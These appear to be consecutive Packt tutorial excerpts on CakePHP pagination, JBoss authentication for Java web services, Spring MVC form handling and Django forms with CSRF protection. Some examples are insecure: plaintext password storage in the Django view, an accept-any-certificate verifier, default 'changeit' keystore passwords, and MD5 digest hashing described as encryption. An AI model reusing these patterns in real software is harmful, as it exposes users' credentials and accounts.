Now, navigating to /products in your web browser will display a listing of the products. Clicking on one of the product names in the listing will redirect you to a detailed view of the product. How it works... We started by defining the pagination setting in our ProductsController class, which defines how the results are treated when returning them via the Paginator component (previously defined in the $components property of the controller). Pagination is a powerful feature of CakePHP, which extends well beyond simply defining the number of results or sort order. We then added an index() method to our ProductsController class, which returns the listing of products. You'll first notice that we accessed a $Product property on the controller. This is the model that we are acting against to read from our table in the database. We didn't create a file or class for this model, as we're taking full advantage of the framework's ability to determine the aspects of our application through convention. Here, as our controller is called ProductsController (in plural), it automatically assumes a Product (in singular) model. Then, in turn, this Product model assumes a products table in our database.
This alone is a prime example of how CakePHP can speed up development by making use of these conventions. You'll also notice that in our ProductsController::index() method, we set the $recursive property of the Product model to -1. This is to tell our model that we're not interested in resolving any associations on it. Associations are other models that are related to this one. This is another powerful aspect of CakePHP. It allows you to determine how models are related to each other, allowing the framework to dynamically generate those links so that you can return results with the relations already mapped out for you. We then called the paginate() method to handle the resolving of the results via the Paginator component. It's common practice to set the $recursive property of all models to -1 by default. This saves heavy queries where associations are resolved to return the related models, when it may not be necessary for the query at hand. This can be done via the AppModel class, which all models extend, or via an intermediate class that you may be using in your application. We had also defined a view($id) method, which is used to resolve a single product and display its details. First, you probably noticed that our method receives an $id argument. By default, CakePHP treats the arguments in methods for actions as parts of the URL. So, if we have a product with an ID of 123, the URL would be /products/view/123. In this case, as our argument doesn't have a default value, in its absence from the URL, the framework would return an error page, which states that an argument was required. You will also notice that our IDs in the products table aren't sequential numbers in this case. This is because we defined our id field as VARCHAR(36). When doing this, CakePHP will use a Universally Unique Identifier (UUID) instead of an auto_increment value. To use a UUID instead of a sequential ID, you can use either CHAR(36) or BINARY(36). Here, we used VARCHAR(36), but note that it can be less performant than BINARY(36) due to collation. The use of a UUID versus a sequential ID is usually preferred due to obfuscation, where it's harder to guess a string of 36 characters, but also, more importantly, if you use database partitioning, replication, or any other means of distributing or clustering your data. We then used the findById() method on the Product model to return a product by its ID (the one passed to the action). This method is actually a magic method: just as you can return a record by its ID, by changing the method to findByAvailable(), for example, you would be able to get all records that have the given value for the available field in the table. These methods are very useful to easily perform queries on the associated table without having to define the methods in question. We also threw NotFoundException for the cases in which a product isn't found for the given ID. This exception is HTTP aware, so it results in an error page if thrown from an action. Finally, we used the set() method to assign the result to a variable in the view. Here we're using the compact() function in PHP, which converts the given variable names into an associative array, where the key is the variable name, and the value is the variable's value. In this case, this provides a $product variable with the results array in the view. You'll find this function useful to rapidly assign variables for your views. We also created our views using HTML, making use of the Paginator, Html, and Time helpers.
You may have noticed that the usage of TimeHelper was not declared in the $helpers property of our ProductsController. This is because CakePHP is able to find and instantiate helpers from the core or the application automatically when they are used in the view for the first time. Then, the sort() method on the Paginator helper helps you create links, which, when clicked on, toggle the sorting of the results by that field. Likewise, the counter(), prev(), numbers(), and next() methods create the paging controls for the table of products. You will also notice the structure of the array that we assigned from our controller. This is the common structure of results returned by a model. This can vary slightly, depending on the type of find() performed (in this case, all), but the typical structure would be as follows (using the real data from our products table here):

Array
(
    [0] => Array
        (
            [Product] => Array
                (
                    [id] => 535c460a-f230-4565-8378-7cae01314e03
                    [name] => Cake
                    [details] => Yummy and sweet
                    [available] => true
                    [created] => 2014-06-12 15:55:32
                    [modified] => 2014-06-12 15:55:32
                )
        )
    [1] => Array
        (
            [Product] => Array
                (
                    [id] => 535c4638-c708-4171-985a-743901314e03
                    [name] => Cookie
                    [details] => Browsers love cookies
                    [available] => true
                    [created] => 2014-06-12 15:55:33
                    [modified] => 2014-06-12 15:55:33
                )
        )
    [2] => Array
        (
            [Product] => Array
                (
                    [id] => 535c49d9-917c-4eab-854f-743801314e03
                    [name] => Helper
                    [details] => Helping you all the way
                    [available] => true
                    [created] => 2014-06-12 15:55:34
                    [modified] => 2014-06-12 15:55:34
                )
        )
)

We also used the link() method on the Html helper, which provides us with the ability to perform reverse routing to generate the link to the desired controller and action, with arguments if applicable. Here, the absence of a controller assumes the current controller, in this case, products. Finally, you may have seen that we used the __() function when writing text in our views. This function is used to handle translations and the internationalization of your application. When using this function, if you were to provide your application in various languages, you would only need to handle the translation of your content and would have no need to revise and modify the code in your views. There are other variations of this function, such as __d() and __n(), which allow you to enhance how you handle the translations. Even if you have no initial intention of providing your application in multiple languages, it's always recommended that you use these functions. You never know, using CakePHP might enable you to create a world class application, which is offered to millions of users around the globe!
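To give a feel for those variations, here is a minimal sketch of the translation functions in a CakePHP 2 view; the $count variable and the 'admin' domain name are illustrative assumptions:

<?php
// Simple translation; the string itself is the lookup key.
echo __('Products');

// Plural-aware translation: __n() picks the singular or plural form
// based on $count, which is also passed as a sprintf-style argument.
echo __n('%d product found', '%d products found', $count, $count);

// Domain-scoped translation: __d() looks the string up in a separate
// translation domain (here, a hypothetical "admin" domain).
echo __d('admin', 'Dashboard');
?>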

The Importance of Securing Web Services

Packt
23 Jul 2014
10 min read
(For more resources related to this topic, see here.) In the upcoming sections of this article, we are going to briefly explain several concepts about the importance of securing web services. The importance of security Security management is one of the main aspects to consider when designing applications. No matter what, neither the functionality nor the information of an organization can be exposed to all users without any kind of restriction. Consider the case of a human resource management application that allows you to consult the wages of employees: if the company manager needs to know the salary of one of their employees, it is not something of great importance. However, in the same context, imagine that one of the employees wants to know the salary of their colleagues; if access to this information is completely open, it could generate problems among employees with varied salaries. Security management options Java provides some options for security management. Right now, we will explain some of them and demonstrate how to implement them. All authentication methods are practically based on credentials delivery from the client to the server. In order to perform this, there are several methods: BASIC authentication, DIGEST authentication, CLIENT-CERT authentication, and using API keys. Security management in applications built with Java, including those with RESTful web services, always relies on JAAS. Basic authentication by providing user credentials This is possibly one of the most used techniques in all kinds of applications. Before gaining access to functionality in the application, the user is requested to enter a username and password; both are validated in order to verify that the credentials are correct (that they belong to an application user). We are 99 percent sure you have performed this technique at least once, maybe through a customized mechanism, or, if you used the JEE platform, probably through JAAS. This kind of control is known as basic authentication. In order to have a working example, let's start our application server, JBoss AS 7, go to the bin directory, and execute the add-user.bat file (the .sh file for UNIX users). Finally, we will create a new user as follows: As a result, we will have a new user in the JBOSS_HOME/standalone/configuration/application-users.properties file. JBoss is already set up with a default security domain called other, which uses the information stored in the file we mentioned earlier in order to authenticate users. Right now, we are going to configure the application to use this security domain. Inside the WEB-INF folder of the resteasy-examples project, let's create a file named jboss-web.xml with the following content:

<?xml version="1.0" encoding="UTF-8"?>
<jboss-web>
  <security-domain>other</security-domain>
</jboss-web>

Alright, let's configure the web.xml file in order to add the security constraints.
In the following block of code, you can see what needs to be added:

<?xml version="1.0" encoding="UTF-8"?>
<web-app version="3.0" xmlns="http://java.sun.com/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/javaee
         http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd">
  <!-- Roles -->
  <security-role>
    <description>Any role</description>
    <role-name>*</role-name>
  </security-role>
  <!-- Resource / Role Mapping -->
  <security-constraint>
    <display-name>Area secured</display-name>
    <web-resource-collection>
      <web-resource-name>protected_resources</web-resource-name>
      <url-pattern>/services/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <auth-constraint>
      <description>User with any role</description>
      <role-name>*</role-name>
    </auth-constraint>
  </security-constraint>
  <login-config>
    <auth-method>BASIC</auth-method>
  </login-config>
</web-app>

From a terminal, let's go to the home folder of the resteasy-examples project and execute mvn jboss-as:redeploy. Now, we are going to test our web service as we did earlier by using SoapUI, performing a request with the POST method. SoapUI shows us the HTTP 401 error; this means that the request wasn't authorized. This is because we performed the request without delivering the credentials to the server. Digest access authentication This authentication method makes use of a hash function to encrypt the password entered by the user before sending it to the server. This makes it obviously much safer than the BASIC authentication method, in which the user's password travels in plain text that can be easily read by whoever intercepts it. To overcome such drawbacks, digest MD5 authentication applies a function to the combination of the values of the username, the realm of application security, and the password. As a result, we obtain an encrypted string that can hardly be interpreted by an intruder. Now, in order to perform what we explained before, we need to generate a password for our example user, using the parameters we talked about earlier: username, realm, and password. Let's go into the JBOSS_HOME/modules/org/picketbox/main/ directory from a terminal and type the following:

java -cp picketbox-4.0.7.Final.jar org.jboss.security.auth.callback.RFC2617Digest username MyRealmName password

We will obtain the following result:

RFC2617 A1 hash: 8355c2bc1aab3025c8522bd53639c168

Through this process, we obtain the encrypted password to use in our password storage file (JBOSS_HOME/standalone/configuration/application-users.properties). We must replace the password in the file; it will be used for the user username. We have to replace it because the old password doesn't contain the realm name information of the application. Next, we have to modify the web.xml file: in the auth-method tag, change the value BASIC to DIGEST, and set the application realm name this way:

<login-config>
  <auth-method>DIGEST</auth-method>
  <realm-name>MyRealmName</realm-name>
</login-config>

Now, let's create a new security domain in JBoss, so we can manage the DIGEST authentication mechanism.
In the JBOSS_HOME/standalone/configuration/standalone.xml file, in the <security-domains> section, let's add the following entry:

<security-domain name="domainDigest" cache-type="default">
  <authentication>
    <login-module code="UsersRoles" flag="required">
      <module-option name="usersProperties" value="${jboss.server.config.dir}/application-users.properties"/>
      <module-option name="rolesProperties" value="${jboss.server.config.dir}/application-roles.properties"/>
      <module-option name="hashAlgorithm" value="MD5"/>
      <module-option name="hashEncoding" value="RFC2617"/>
      <module-option name="hashUserPassword" value="false"/>
      <module-option name="hashStorePassword" value="true"/>
      <module-option name="passwordIsA1Hash" value="true"/>
      <module-option name="storeDigestCallback" value="org.jboss.security.auth.callback.RFC2617Digest"/>
    </login-module>
  </authentication>
</security-domain>

Finally, in the application, change the security domain name in the jboss-web.xml file as shown in the following snippet:

<?xml version="1.0" encoding="UTF-8"?>
<jboss-web>
  <security-domain>java:/jaas/domainDigest</security-domain>
</jboss-web>

The authentication method in web.xml must now be DIGEST with the realm name set, as shown earlier. Now, restart the application server and redeploy the application on JBoss. To do this, execute the next command on the terminal:

mvn jboss-as:redeploy

Authentication through certificates This is a mechanism in which a trust agreement is established between the server and the client through certificates. They must be signed by an agency established to ensure that the certificate presented for authentication is legitimate; this agency is known as a certificate authority (CA). This security mechanism requires that our application server uses HTTPS as the communication protocol, so we must enable HTTPS. Let's add a connector in the standalone.xml file; look for the following line:

<connector name="http"

Add the following block of code:

<connector name="https" protocol="HTTP/1.1" scheme="https" socket-binding="https" secure="true">
  <ssl password="changeit" certificate-key-file="${jboss.server.config.dir}/server.keystore" verify-client="want" ca-certificate-file="${jboss.server.config.dir}/server.truststore"/>
</connector>

Next, we add the security domain:

<security-domain name="RequireCertificateDomain">
  <authentication>
    <login-module code="CertificateRoles" flag="required">
      <module-option name="securityDomain" value="RequireCertificateDomain"/>
      <module-option name="verifier" value="org.jboss.security.auth.certs.AnyCertVerifier"/>
      <module-option name="usersProperties" value="${jboss.server.config.dir}/my-users.properties"/>
      <module-option name="rolesProperties" value="${jboss.server.config.dir}/my-roles.properties"/>
    </login-module>
  </authentication>
  <jsse keystore-password="changeit" keystore-url="file:${jboss.server.config.dir}/server.keystore" truststore-password="changeit" truststore-url="file:${jboss.server.config.dir}/server.truststore"/>
</security-domain>

As you can see, we need two files: my-users.properties and my-roles.properties; both are empty and located in the JBOSS_HOME/standalone/configuration path.
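Note that the connector and security domain above also reference server.keystore and server.truststore files in the configuration directory. If you do not have these yet, a self-signed pair for local testing can be generated with the JDK's keytool; the aliases, validity, and passwords below are assumptions for a test setup, and a production deployment would use CA-signed certificates instead:

# Generate the server's key pair in server.keystore
keytool -genkeypair -alias server -keyalg RSA -validity 365 \
  -keystore server.keystore -storepass changeit

# Export a client certificate (generated the same way on the client side)
keytool -exportcert -alias client -keystore client.keystore \
  -storepass changeit -file client.cer

# Import the trusted client certificate into the server's truststore
keytool -importcert -alias client -file client.cer \
  -keystore server.truststore -storepass changeit -noprompt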
We are going to add the <user-data-constraint> tag in the web.xml file in this way:

<security-constraint>
  ...
  <user-data-constraint>
    <transport-guarantee>CONFIDENTIAL</transport-guarantee>
  </user-data-constraint>
</security-constraint>

Then, change the authentication method to CLIENT-CERT:

<login-config>
  <auth-method>CLIENT-CERT</auth-method>
</login-config>

And finally, change the security domain in the jboss-web.xml file in the following way:

<?xml version="1.0" encoding="UTF-8"?>
<jboss-web>
  <security-domain>RequireCertificateDomain</security-domain>
</jboss-web>

Now, restart the application server, and redeploy the application with Maven:

mvn jboss-as:redeploy

API keys With the advent of cloud computing, it is not difficult to think of applications that integrate with many others available in the cloud. Right now, it's easy to see how applications interact with Flickr, Facebook, Twitter, Tumblr, and so on through the use of API keys. This authentication method is used primarily when we need to authenticate from another application but do not want to access the private user data hosted in that application; on the contrary, if you want to access this information, you must use OAuth. Today, it is very easy to get an API key. Simply sign up with one of the many cloud providers and obtain credentials consisting of a key and a secret, which are needed to interact with the authenticating service provider. Keep in mind that when creating an API key, you accept the terms of the supplier, which clearly state what we can and cannot do, protecting the supplier against abusive users trying to affect their services. The following chart shows how this authentication mechanism works: Summary In this article, we went through some models of authentication. We can apply them to any web service functionality we have created. As you can see, it is important to choose the correct security management; otherwise, information is exposed and can easily be intercepted and used by third parties. Therefore, tread carefully. Resources for Article: Further resources on this subject: RESTful Java Web Services Design [Article] Debugging REST Web Services [Article] RESTful Services JAX-RS 2.0 [Article]

Serving and processing forms

Packt
24 Jun 2014
13 min read
(For more resources related to this topic, see here.) Spring supports different view technologies, but if we are using JSP-based views, we can make use of the Spring tag library tags to make up our JSP pages. These tags provide many useful, common functionalities such as form binding, evaluating errors, outputting internationalized messages, and so on. In order to use these tags, we must add references to this tag library in our JSP pages as follows:

<%@taglib prefix="form" uri="http://www.springframework.org/tags/form" %>
<%@taglib prefix="spring" uri="http://www.springframework.org/tags" %>

The data transfer takes place from model to view via the controller. The following line is a typical example of how we put data into the model from a controller:

model.addAttribute("greeting", "Welcome");

Similarly, the next line shows how we retrieve that data in the view using a JSTL expression:

<p> ${greeting} </p>

JavaServer Pages Standard Tag Library (JSTL) is also a tag library, provided by Oracle. It is a collection of useful JSP tags that encapsulate the core functionality common to many JSP pages. We can add a reference to the JSTL tag library in our JSP pages as <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>. However, what if we want to put data into the model from the view? How do we retrieve that data in the controller? For example, consider a scenario where an admin of our store wants to add new product information to our store by filling in and submitting an HTML form. How can we collect the values filled into the HTML form elements and process them in the controller? This is where the Spring tag library tags help us bind the HTML tag elements' values to a form-backing bean in the model. Later, the controller can retrieve the form-backing bean from the model using the @ModelAttribute annotation (org.springframework.web.bind.annotation.ModelAttribute). Form-backing beans (sometimes called form beans) are used to store form data. We can even use our domain objects as form beans; this works well when there's a close match between the fields on the form and the properties of our domain object. Another approach is to create separate classes for form beans, which are sometimes called Data Transfer Objects (DTOs). Time for action – serving and processing forms The Spring tag library provides some special <form> and <input> tags that are more or less similar to HTML form and input tags, but have some special attributes to bind the form elements' data with the form-backing bean.
Let's create a Spring web form in our application to add new products to our product list by performing the following steps: We open our ProductRepository interface and add one more method declaration in it as follows:

void addProduct(Product product);

We then add an implementation for this method in the InMemoryProductRepository class as follows:

public void addProduct(Product product) {
    listOfProducts.add(product);
}

We open our ProductService interface and add one more method declaration in it as follows:

void addProduct(Product product);

And, we add an implementation for this method in the ProductServiceImpl class as follows:

public void addProduct(Product product) {
    productRepository.addProduct(product);
}

We open our ProductController class and add two more request mapping methods as follows:

@RequestMapping(value = "/add", method = RequestMethod.GET)
public String getAddNewProductForm(Model model) {
    Product newProduct = new Product();
    model.addAttribute("newProduct", newProduct);
    return "addProduct";
}

@RequestMapping(value = "/add", method = RequestMethod.POST)
public String processAddNewProductForm(@ModelAttribute("newProduct") Product productToBeAdded) {
    productService.addProduct(productToBeAdded);
    return "redirect:/products";
}

Finally, we add one more JSP view file called addProduct.jsp under src/main/webapp/WEB-INF/views/ and add the following tag reference declarations in it as the very first lines:

<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
<%@ taglib prefix="form" uri="http://www.springframework.org/tags/form" %>

Now, we add the following code snippet under the tag declaration lines and save addProduct.jsp (note that I have skipped the <form:input> binding tags for some of the fields of the product domain object, but I strongly encourage you to add binding tags for the skipped fields when you try out this exercise):

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css">
<title>Products</title>
</head>
<body>
  <section>
    <div class="jumbotron">
      <div class="container">
        <h1>Products</h1>
        <p>Add products</p>
      </div>
    </div>
  </section>
  <section class="container">
    <form:form modelAttribute="newProduct" class="form-horizontal">
      <fieldset>
        <legend>Add new product</legend>
        <div class="form-group">
          <label class="control-label col-lg-2" for="productId">Product Id</label>
          <div class="col-lg-10">
            <form:input id="productId" path="productId" type="text" class="form:input-large"/>
          </div>
        </div>
        <!-- Similarly bind <form:input> tags for the name, unitPrice, manufacturer, category, unitsInStock, and unitsInOrder fields -->
        <div class="form-group">
          <label class="control-label col-lg-2" for="description">Description</label>
          <div class="col-lg-10">
            <form:textarea id="description" path="description" rows="2"/>
          </div>
        </div>
        <div class="form-group">
          <label class="control-label col-lg-2" for="discontinued">Discontinued</label>
          <div class="col-lg-10">
            <form:checkbox id="discontinued" path="discontinued"/>
          </div>
        </div>
        <div class="form-group">
          <label class="control-label col-lg-2" for="condition">Condition</label>
          <div class="col-lg-10">
            <form:radiobutton path="condition" value="New"/>New
            <form:radiobutton path="condition" value="Old"/>Old
            <form:radiobutton path="condition" value="Refurbished"/>Refurbished
          </div>
        </div>
        <div class="form-group">
          <div class="col-lg-offset-2 col-lg-10">
            <input type="submit" id="btnAdd" class="btn btn-primary" value="Add"/>
          </div>
        </div>
      </fieldset>
    </form:form>
  </section>
</body>
</html>

Now, we run our application and enter the URL http://localhost:8080/webstore/products/add. We will be able to see a web page that displays a web form where we can add the product information. Now, we enter all the information related to the new product that we want to add and click on the Add button; we will see the new product added to the product listing page under the URL http://localhost:8080/webstore/products. What just happened? In the whole sequence, steps 5 and 6 are the ones that need to be observed carefully. I will give you a brief note on what we have done in steps 1 to 4. In step 1, we created a method declaration addProduct in our ProductRepository interface to add new products. In step 2, we implemented the addProduct method in our InMemoryProductRepository class; the implementation just updates the existing listOfProducts by adding a new product to the list. Steps 3 and 4 are just a service layer extension for ProductRepository. In step 3, we declared a similar method, addProduct, in our ProductService interface and implemented it in step 4 to add products to the repository via the productRepository reference. Okay, coming back to the important step; we have done nothing but add two request mapping methods, namely, getAddNewProductForm and processAddNewProductForm, in step 5 as follows:

@RequestMapping(value = "/add", method = RequestMethod.GET)
public String getAddNewProductForm(Model model) {
    Product newProduct = new Product();
    model.addAttribute("newProduct", newProduct);
    return "addProduct";
}

@RequestMapping(value = "/add", method = RequestMethod.POST)
public String processAddNewProductForm(@ModelAttribute("newProduct") Product productToBeAdded) {
    productService.addProduct(productToBeAdded);
    return "redirect:/products";
}

If you observe these methods carefully, you will notice a peculiar thing, which is that both methods have the same URL mapping value in their @RequestMapping annotations (value = "/add"). So, if we enter the URL http://localhost:8080/webstore/products/add in the browser, which method will Spring MVC map that request to? The answer lies in the second attribute of the @RequestMapping annotation (method = RequestMethod.GET and method = RequestMethod.POST). If you look again, even though both methods have the same URL mapping, they differ in the request method. So, what is happening behind the screen is that when we enter the URL http://localhost:8080/webstore/products/add in the browser, it is considered a GET request. So, Spring MVC maps this request to the getAddNewProductForm method, and within this method, we simply attach a new empty Product domain object to the model under the attribute name newProduct:

Product newProduct = new Product();
model.addAttribute("newProduct", newProduct);

So, in the view addProduct.jsp, we can access this model object, newProduct. Before jumping into the processAddNewProductForm method, let's review the addProduct.jsp view file for some time so that we are able to understand the form processing flow without confusion. In addProduct.jsp, we have just added a <form:form> tag from the Spring tag library using the following line of code:

<form:form modelAttribute="newProduct" class="form-horizontal">

Since this special <form:form> tag is acquired from the Spring tag library, we need to add a reference to this tag library in our JSP file.
That's why we have added the following line at the top of the addProduct.jsp file in step 6:

<%@ taglib prefix="form" uri="http://www.springframework.org/tags/form" %>

In the Spring <form:form> tag, one of the important attributes is modelAttribute. In our case, we assigned the value newProduct as the value of modelAttribute in the <form:form> tag. If you recall correctly, you will notice that this value of modelAttribute and the attribute name we used to store the newProduct object in the model from our getAddNewProductForm method are the same. So, the newProduct object that we attached to the model in the controller method (getAddNewProductForm) is now bound to the form. This object is called the form-backing bean in Spring MVC. Okay, now notice each <form:input> tag inside the <form:form> tag shown in the following code. You will observe that there is a common attribute in every tag. This attribute's name is path:

<form:input id="productId" path="productId" type="text" class="form:input-large"/>

The path attribute just indicates the field name that is relative to the form-backing bean. So, the value that is entered in this input box at runtime will be bound to the corresponding field of the form bean. Okay, now is the time to come back and review our processAddNewProductForm method. When will this method be invoked? This method will be invoked once we press the submit button of our form. Yes, since every form submission is considered a POST request, this time the browser will send a POST request to the same URL, that is, http://localhost:8080/webstore/products/add. So, this time, the processAddNewProductForm method will get invoked since it is a POST request. Inside the processAddNewProductForm method, we simply call the addProduct service method to add the new product to the repository, as follows:

productService.addProduct(productToBeAdded);

However, the interesting question here is, how is the productToBeAdded object populated with the data that we entered in the form? The answer lies within the @ModelAttribute annotation (org.springframework.web.bind.annotation.ModelAttribute). Note the method signature of the processAddNewProductForm method shown in the following line of code:

public String processAddNewProductForm(@ModelAttribute("newProduct") Product productToBeAdded)

Here, if you notice the value attribute of the @ModelAttribute annotation, you will observe a pattern. The values of the @ModelAttribute annotation and modelAttribute from the <form:form> tag are the same. So, Spring MVC knows that it should assign the form-bound newProduct object to the productToBeAdded parameter of the processAddNewProductForm method. The @ModelAttribute annotation is not only used to retrieve an object from the model; if we want to, we can even use it to add objects to the model. For instance, we can rewrite our getAddNewProductForm method to something like the following code with the use of the @ModelAttribute annotation:

@RequestMapping(value = "/add", method = RequestMethod.GET)
public String getAddNewProductForm(@ModelAttribute("newProduct") Product newProduct) {
    return "addProduct";
}

You can notice that we haven't created any new empty Product domain object and attached it to the model. All we have done is added a parameter of the type Product and annotated it with the @ModelAttribute annotation so that Spring MVC would know that it should create an object of Product and attach it to the model under the name newProduct.
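All of this binding works against the properties of the Product domain object. The book defines this class elsewhere; purely as an orientation aid, a minimal sketch of the shape implied by the path attributes above might look like the following (field types are assumptions):

public class Product {
    private String productId;     // bound by path="productId"
    private String description;   // bound by the <form:textarea> tag
    private boolean discontinued; // bound by the <form:checkbox> tag
    private String condition;     // bound by the <form:radiobutton> tags

    // Spring's form binding reads and writes these fields through
    // standard JavaBean getters and setters.
    public String getProductId() { return productId; }
    public void setProductId(String productId) { this.productId = productId; }
    public String getDescription() { return description; }
    public void setDescription(String description) { this.description = description; }
    public boolean isDiscontinued() { return discontinued; }
    public void setDiscontinued(boolean discontinued) { this.discontinued = discontinued; }
    public String getCondition() { return condition; }
    public void setCondition(String condition) { this.condition = condition; }
    // ... name, unitPrice, and the other skipped fields would follow the same pattern
}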
One more thing that needs to be observed in the processAddNewProductForm method is the logical view name, redirect:/products, that it returns. So, what are we trying to tell Spring MVC by returning a string redirect:/products? To get the answer, observe the logical view name string carefully. If we split this string with the : (colon) symbol, we will get two parts; the first part is the prefix redirect and the second part is something that looks like a request path, /products. So, instead of returning a view name, we simply instruct Spring to issue a redirect request to the request path, /products, which is the request path for the list method of our ProductController class. So, after submitting the form, we list the products using the list method of ProductController. As a matter of fact, when we return any request path with the redirect: prefix from a request mapping method, Spring uses a special view object, RedirectView (org.springframework.web.servlet.view.RedirectView), to issue a redirect command behind the screen. Instead of landing in a web page after the successful submission of a web form, we are spawning a new request to the request path /products with the help of RedirectView. This pattern is called Redirect After Post, which is a common pattern to use with web-based forms. We are using this pattern to avoid double submission of the same form; sometimes, if we press the browser's refresh button or back button after submitting the form, there are chances that the same form will be resubmitted. Summary This article introduced you to Spring and Spring form tag libraries in web form handling. You also learned how to bind domain objects with views and how to use message bundles to externalize label caption texts. Resources for Article: Further resources on this subject: Spring MVC - Configuring and Deploying the Application [article] Getting Started With Spring MVC - Developing the MVC components [article] So, what is Spring for Android? [article]

Adding a developer with Django forms

Packt
18 Jun 2014
8 min read
(For more resources related to this topic, see here.) When displaying the form, the form object will generate the contents of the form template. We may change the type of field that the object sends to the template if needed. While receiving the data, the object will check the contents of each form element. If there is an error, the object will send a clear error to the client. If there is no error, we are certain that the form data is correct. CSRF protection Cross-Site Request Forgery (CSRF) is an attack that targets a user who is loading a page that contains a malicious request. The malicious script uses the authentication of the victim to perform unwanted actions, such as changing data or accessing sensitive data. The following steps are executed during a CSRF attack:

1. Script injection by the attacker.
2. An HTTP query is performed to get a web page.
3. Downloading the web page that contains the malicious script.
4. Malicious script execution.

In this kind of attack, the hacker can also modify information that may be critical for the users of the website. Therefore, it is important for a web developer to know how to protect their site from this kind of attack, and Django will help with this. To re-enable CSRF protection, we must edit the settings.py file and uncomment the following line:

'django.middleware.csrf.CsrfViewMiddleware',

This protection ensures that the data that has been sent was really sent from a specific page of the site. You can check this in two easy steps: When creating an HTML or Django form, we insert a CSRF token that the server will store. When the form is sent, the CSRF token is sent too; when the server receives the request from the client, it checks the CSRF token, and if it is valid, it validates the request. Do not forget to add the CSRF token in all the forms of the site where protection is enabled. HTML forms are also involved, and the one we have just made does not include the token. For the previous form to work with CSRF protection, we need to add the following line between the <form> and </form> tags:

{% csrf_token %}

The view with a Django form We will first write the view that contains the form because the template will display the form defined in the view. Django forms can be stored in separate files, such as a forms.py file at the root of the project. We include them directly in our view because the form will only be used on this page. Depending on the project, you must choose which architecture suits you best. We will create our view in the views/create_developer.py file with the following lines:

from django.shortcuts import render
from django.http import HttpResponse
from TasksManager.models import Supervisor, Developer
# This line imports the Django forms package
from django import forms

class Form_inscription(forms.Form):
    # This class creates the form with four fields. It is an object that
    # inherits from forms.Form. It contains attributes that define the
    # form fields.
    name = forms.CharField(label="Name", max_length=30)
    login = forms.CharField(label="Login", max_length=30)
    password = forms.CharField(label="Password", widget=forms.PasswordInput)
    supervisor = forms.ModelChoiceField(label="Supervisor", queryset=Supervisor.objects.all())

# View for create_developer
def page(request):
    if request.POST:
        # If the form has been posted, we create the variable that will
        # contain our form filled with the data sent by the POST request.
        form = Form_inscription(request.POST)
        if form.is_valid():
            # This line checks that the data sent by the user is
            # consistent with the fields defined in the form.
            name = form.cleaned_data['name']
            # This line is used to retrieve the value sent by the client.
            # The collected data is filtered by the clean() method that we
            # will see later. This way of recovering data provides secure
            # data.
            login = form.cleaned_data['login']
            password = form.cleaned_data['password']
            supervisor = form.cleaned_data['supervisor']
            # In this line, the supervisor variable is of the Supervisor
            # type; that is to say, the data returned by the cleaned_data
            # dictionary will directly be a model instance.
            new_developer = Developer(name=name, login=login, password=password, email="", supervisor=supervisor)
            new_developer.save()
            return HttpResponse("Developer added")
        else:
            # To send the form to the template, just send it like any
            # other variable. We send it in case the form is not valid,
            # in order to display user errors.
            return render(request, 'en/public/create_developer.html', {'form': form})
    else:
        # In this case, the user has not yet displayed the form; it is
        # instantiated with no data inside.
        form = Form_inscription()
        return render(request, 'en/public/create_developer.html', {'form': form})

When an error occurs, the form is displayed again with an error message. Template of a Django form We set the template for this view. The template will be much shorter:

{% extends "base.html" %}
{% block title_html %} Create Developer {% endblock %}
{% block h1 %} Create Developer {% endblock %}
{% block article_content %}
<form method="post" action="{% url "create_developer" %}" >
  {% csrf_token %} <!-- This line inserts a CSRF token. -->
  <table>
    {{ form.as_table }} <!-- This line displays the lines of the form. -->
  </table>
  <p><input type="submit" value="Create" /></p>
</form>
{% endblock %}

As the complete form operation is in the view, the template simply executes the as_table() method to generate the HTML form. The previous code displays data in tabular form. The three methods to generate an HTML form structure are as follows:

• as_table: This displays the form fields in <tr> <td> tags
• as_ul: This displays the form fields in <li> tags
• as_p: This displays the form fields in <p> tags

So, we quickly wrote a secure form with error handling and CSRF protection through Django forms. The form based on a model ModelForms are Django forms based on models. The fields of these forms are automatically generated from the model that we have defined. Indeed, developers are often required to create forms with fields that correspond to those in the database, even for a non-MVC website. These particular forms have a save() method that will save the form data in a new record. The supervisor creation form To introduce ModelForms, we will take, for example, the addition of a supervisor. For this, we will create a new page with the following URL:

url(r'^create-supervisor$', 'TasksManager.views.create_supervisor.page', name="create_supervisor"),

Our view will contain the following code:

from django.shortcuts import render
from TasksManager.models import Supervisor
from django import forms
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse

def page(request):
    if len(request.POST) > 0:
        form = Form_supervisor(request.POST)
        if form.is_valid():
            # If the form is valid, we store the form data in a new
            # model record.
            form.save(commit=True)
            # This line is used to redirect to the specified URL.
            # We use the reverse() function to get the URL from the name
            # defined in urls.py.
            return HttpResponseRedirect(reverse('public_index'))
        else:
            return render(request, 'en/public/create_supervisor.html', {'form': form})
    else:
        form = Form_supervisor()
        return render(request, 'en/public/create_supervisor.html', {'form': form})

class Form_supervisor(forms.ModelForm):
    # Here we create a class that inherits from ModelForm.
    class Meta:
        # We extend the Meta class of the ModelForm. It is this class
        # that allows us to define the properties of the ModelForm.
        model = Supervisor  # We define the model that the form should be based on.
        exclude = ('date_created', 'last_connexion', )
        # We exclude certain fields from this form. It would also have
        # been possible to do the opposite, that is to say, define the
        # desired form fields with the fields property.

As seen in the line exclude = ('date_created', 'last_connexion', ), it is possible to restrict the form fields. Both the exclude and fields properties must be used correctly. Indeed, these properties receive a tuple of the fields to exclude or include as arguments. They can be described as follows: exclude: This is used in the case of a form accessible to the administrator, because if you add a field to the model, it will be included in the form. fields: This is used in cases in which the form is accessible to users; indeed, if we add a field to the model, it will not be visible to the user. For example, imagine we have a website selling royalty-free images with a registration form based on ModelForm, and the administrator adds a credit field to the extended model of the user. If the developer had used the exclude property on some of the fields and did not add credit to it, the user would be able to take as many credits as he/she wants. We will resume our previous template, where we will change the URL present in the action attribute of the <form> tag:

{% url "create_supervisor" %}

